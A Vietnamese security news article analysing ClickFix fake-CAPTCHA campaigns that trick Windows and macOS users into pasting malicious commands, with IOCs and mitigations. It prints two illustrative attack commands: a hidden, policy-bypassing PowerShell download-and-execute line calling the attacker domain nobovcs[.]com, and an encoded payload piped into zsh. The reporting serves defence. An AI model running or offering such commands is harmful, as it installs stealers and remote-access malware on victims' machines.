ClickFix Tái Xuất: Mối Đe Dọa Mạng Nguy Hiểm Trên Windows & macOS

Kỹ thuật xã hội có tên ClickFix đã tái xuất hiện với cường độ đáng kể, lừa dối người dùng trên cả nền tảng Windows và macOS. Kỹ thuật này khiến họ tự thực thi các lệnh độc hại, âm thầm cài đặt mã độc vào thiết bị. Được ghi nhận lần đầu vào cuối năm 2023, ClickFix đã nhanh chóng phát triển từ một chiến thuật chuyên biệt thành một trong những chiến lược truy cập ban đầu được áp dụng rộng rãi nhất trong hệ sinh thái tội phạm mạng.

Cơ chế tấn công mạng của ClickFix

Điều khiến ClickFix đặc biệt nguy hiểm là sự bình thường hóa vẻ ngoài của nó đối với những người dùng không cảnh giác. Thay vì khai thác trực tiếp một lỗ hổng phần mềm, kỹ thuật này hiển thị cho nạn nhân một màn hình xác minh giả mạo, bắt chước các dịch vụ đáng tin cậy như Cloudflare CAPTCHA hoặc Google reCAPTCHA.

Một lệnh độc hại được âm thầm đặt vào clipboard thông qua JavaScript chạy nền. Nạn nhân sau đó được hướng dẫn dán lệnh này vào hộp thoại Windows Run hoặc macOS Terminal. Hành động này vô tình cấp cho kẻ tấn công quyền truy cập trực tiếp vào hệ thống của họ.

Phân tích mối đe dọa mạng ClickFix

Các nhà nghiên cứu từ Insikt Group của Recorded Future đã xác định năm cụm chiến dịch ClickFix riêng biệt. Mỗi cụm đều sử dụng cùng một kỹ thuật lừa đảo cốt lõi nhưng khác nhau về chủ đề, hạ tầng và các ngành mục tiêu. Các dịch vụ bị mạo danh bao gồm Intuit QuickBooks, Booking.com và nền tảng tiếp thị AI Birdeye.

Các mục tiêu bao trùm các lĩnh vực kế toán, du lịch, bất động sản và dịch vụ pháp lý. Các phát hiện, được công bố vào ngày 25 tháng 3 năm 2026, xác nhận rằng cả các nhóm tội phạm mạng và các nhóm tấn công có nguồn lực cao đều đang tích cực tận dụng phương pháp này. Để biết thêm chi tiết, tham khảo báo cáo của Recorded Future: ClickFix Campaigns Targeting Windows and macOS.

Kỹ thuật Living-off-the-Land (LotL) và Tác động

Cả năm cụm tấn công ClickFix đều dựa vào phương pháp Living-off-the-Land (LotL). Điều này có nghĩa là chúng sử dụng các công cụ hệ thống đáng tin cậy đã có sẵn trên hệ điều hành để thực hiện cuộc tấn công. Bằng cách định tuyến thực thi thông qua các tiện ích gốc như PowerShell hoặc macOS Terminal, kẻ tấn công hoạt động hiệu quả ngoài tầm với của hầu hết các biện pháp phòng thủ bảo mật dựa trên trình duyệt tiêu chuẩn.

Các loại mã độc được triển khai

Các họ mã độc được triển khai trong các chiến dịch ClickFix bao gồm NetSupport RAT, Odyssey Stealer, Lumma Stealer, và MacSync. Đây là những công cụ có khả năng kiểm soát hệ thống từ xa, đánh cắp thông tin đăng nhập và thu thập dữ liệu ví tiền điện tử từ các thiết bị bị nhiễm.

Chi tiết kỹ thuật thực thi trên Windows

Trên Windows, nạn nhân được hướng dẫn mở hộp thoại Run và dán một lệnh trông giống như lệnh xác minh. Trong cụm tấn công nhắm vào QuickBooks, lệnh được dán sẽ khởi chạy một tiến trình PowerShell ẩn. Tiến trình này sử dụng kỹ thuật che giấu bằng cách trộn lẫn chữ hoa/thường (mixed-case obfuscation) và rút gọn bí danh tham số (shortened parameter aliases) để vượt qua các biện pháp phát hiện dựa trên chữ ký.

Bộ tải trung gian (stager) này sẽ liên hệ với các miền do kẻ tấn công kiểm soát, ví dụ như nobovcs[.]com, và truy xuất một script phụ có tên bibi.php, vốn có chức năng cài đặt NetSupport RAT. Script này cũng tạo một thư mục có tên ngẫu nhiên trong thư mục dữ liệu ứng dụng cục bộ của người dùng, sử dụng các từ ngữ liên quan đến chủ đề lãng mạn. Đây là một động thái có chủ ý nhằm hòa nhập và tránh gây nghi ngờ.

# Ví dụ về cấu trúc lệnh PowerShell bị che giấu (minh họa)cmd.exe /c powershell -w hIdDeN -eXEc BypaSs -c "IEX (New-Object Net.WebClient).DownloadString('http://nobovcs[.]com/bibi.php')"

Chi tiết kỹ thuật thực thi trên macOS

Trên macOS, cuộc tấn công theo một lộ trình tương tự thông qua Terminal. Trong Cụm 5, một trang mạo danh trang hỗ trợ của Apple đã hướng dẫn người dùng chạy một lệnh để giải phóng dung lượng lưu trữ.

Lệnh đó sử dụng các lớp mã hóa chồng chất — trước tiên giải mã hex sang Base64, sau đó đưa kết quả qua shell zsh — để âm thầm tải và chạy MacSync, một công cụ đánh cắp thông tin. Cụm 4 đã mở rộng điều này hơn nữa bằng cách phát hiện hệ điều hành của nạn nhân và cung cấp một lệnh được tùy chỉnh cho từng nền tảng, cho thấy mức độ tinh vi mà các tác nhân đe dọa đang tinh chỉnh các cuộc tấn công này.

# Ví dụ về cấu trúc lệnh Terminal bị che giấu (minh họa)echo "hex_encoded_base64_payload" | xxd -r -p | base64 --decode | zsh

Ảnh hưởng hệ thống và khả năng truy vết

Khi quá trình thực thi hoàn tất, payload cuối cùng chạy hoàn toàn trong bộ nhớ, gần như không để lại dấu vết pháp y nào trên thiết bị. Trên Windows, khả năng duy trì được thiết lập bằng cách đặt một shortcut trong thư mục Startup, đảm bảo mã độc tự động kích hoạt lại sau mỗi lần khởi động lại hệ thống.

Chỉ số Thỏa hiệp (IOCs)

Dưới đây là các chỉ số thỏa hiệp liên quan đến các chiến dịch ClickFix đã được phân tích:

• Tên miền Command & Control (C2): nobovcs[.]com
• Script độc hại: bibi.php

Biện pháp bảo vệ và an ninh mạng

Các nhóm bảo mật cần thực hiện các biện pháp sau để giảm thiểu rủi ro từ các cuộc tấn công ClickFix:

Đối với hệ thống Windows:

• Vô hiệu hóa hộp thoại Run: Sử dụng Group Policy Objects (GPO) để loại bỏ đường dẫn phân phối chính này.
• Thực thi PowerShell an toàn: Triển khai PowerShell Constrained Language Mode cùng với các chính sách AppLocker hoặc Windows Defender Application Control (WDAC) để giúp chặn việc thực thi script trái phép.

Đối với hệ thống macOS:

• Hạn chế truy cập Terminal: Hạn chế quyền truy cập vào Terminal thông qua quản lý thiết bị di động (MDM).
• Kích hoạt System Integrity Protection (SIP): Đảm bảo SIP luôn được bật.

Biện pháp chung cho cả hai nền tảng:

• Đào tạo nhận thức người dùng: Thực hiện đào tạo nhận thức người dùng nhắm mục tiêu, đặc biệt giải quyết các chiêu trò lừa đảo liên quan đến yêu cầu xác minh thủ công. Đây là một trong những cách hiệu quả nhất để ngăn chặn một cuộc tấn công ClickFix trước khi bất kỳ lệnh độc hại nào được thực thi.
• Cập nhật Threat Intelligence: Liên tục cập nhật các nền tảng SIEM và EDR với thông tin tình báo mối đe dọa (threat intelligence) hiện tại để chặn các miền staging và command-and-control mới được xác định. Việc này bổ sung một lớp phòng thủ quan trọng khác, nâng cao khả năng an ninh mạng của tổ chức.